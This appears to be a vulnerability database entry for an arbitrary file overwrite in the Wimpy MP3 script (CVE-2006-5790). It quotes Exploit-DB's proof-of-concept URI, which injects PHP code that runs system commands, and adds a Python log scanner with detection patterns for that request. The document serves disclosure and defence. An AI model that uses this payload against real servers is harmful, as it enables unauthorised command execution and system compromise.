Vendor: Wimpy MP3
By: Unknown
CVSS: 6.5 (MEDIUM)
Arbitrary File Overwrite
CWE: 22
Product Name: Wimpy MP3
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2006-5790
CPE: a:wimpy:mp3
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2006

Arbitrary File Overwrite in Wimpy MP3

The Wimpy MP3 application has an arbitrary file overwrite weakness. An attacker can exploit it by supplying malicious data through the 'trackFile' parameter of the 'wimpy_trackplays.php' script, which overwrites a text file with attacker-supplied content. Successful exploitation can assist an attacker in further attacks.

Mitigation:

It is recommended to update to a patched version of the Wimpy MP3 application; note that this entry lists no patch (Patch Exists: NO). In addition, the script should validate its input so that request parameters cannot be used to execute arbitrary commands or overwrite files.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16696/info

Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data.

Successful exploitation of this issue may aid an attacker in further attacks.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>
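
Detection logic for the request shape in the proof of concept above, added here as an example (it is not part of the original advisory or of Wimpy's own code): it scans web server access log lines for requests to wimpy_trackplays.php whose trackFile, trackArtist or trackTitle values carry PHP tags or call syntax, checking each field separately because the PoC splits the payload across all three. The combined log format, the sample lines, the benign values and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET = "wimpy_trackplays.php"
# Parameters the proof-of-concept URI uses to carry attacker-supplied content.
LOGGED_FIELDS = ("trackFile", "trackArtist", "trackTitle")
# A PHP open or close tag, or a call shape such as name(" / name(' / name($.
CODE_RE = re.compile(r'<\?|\?>|\b[a-z_]\w*\s*\(\s*["\'$]', re.I)

def suspicious_fields(log_line):
    """Return the logged fields of one request that contain code-like text."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + TARGET):
        return []
    # parse_qsl percent-decodes values, so %3C%3Fphp is matched as <?php.
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    return [f for f in LOGGED_FIELDS if CODE_RE.search(params.get(f, ""))]

def scan(lines):
    """Return (line_number, fields) for every log line worth reviewing."""
    hits = []
    for n, line in enumerate(lines, start=1):
        fields = suspicious_fields(line)
        if fields:
            hits.append((n, fields))
    return hits

# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /pathtowimpy/goodies/'
    'wimpy_trackplays.php?myAction=trackplays&trackFile=song.mp3'
    '&trackArtist=Some+Artist&trackTitle=Intro+(Live) HTTP/1.1" 200 12',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /pathtowimpy/goodies/'
    'wimpy_trackplays.php?myAction=trackplays&trackFile=%3C%3Fphp'
    '&trackArtist=system(%22uname%20-a;id;%22);&trackTitle=%3F%3E HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for lineno, fields in scan(SAMPLE_LOG):
        print(f"line {lineno}: code-like content in {', '.join(fields)}")
```

A hit means the text file written by the script should be inspected for injected content; a clean log does not rule out POST bodies, which access logs normally do not record.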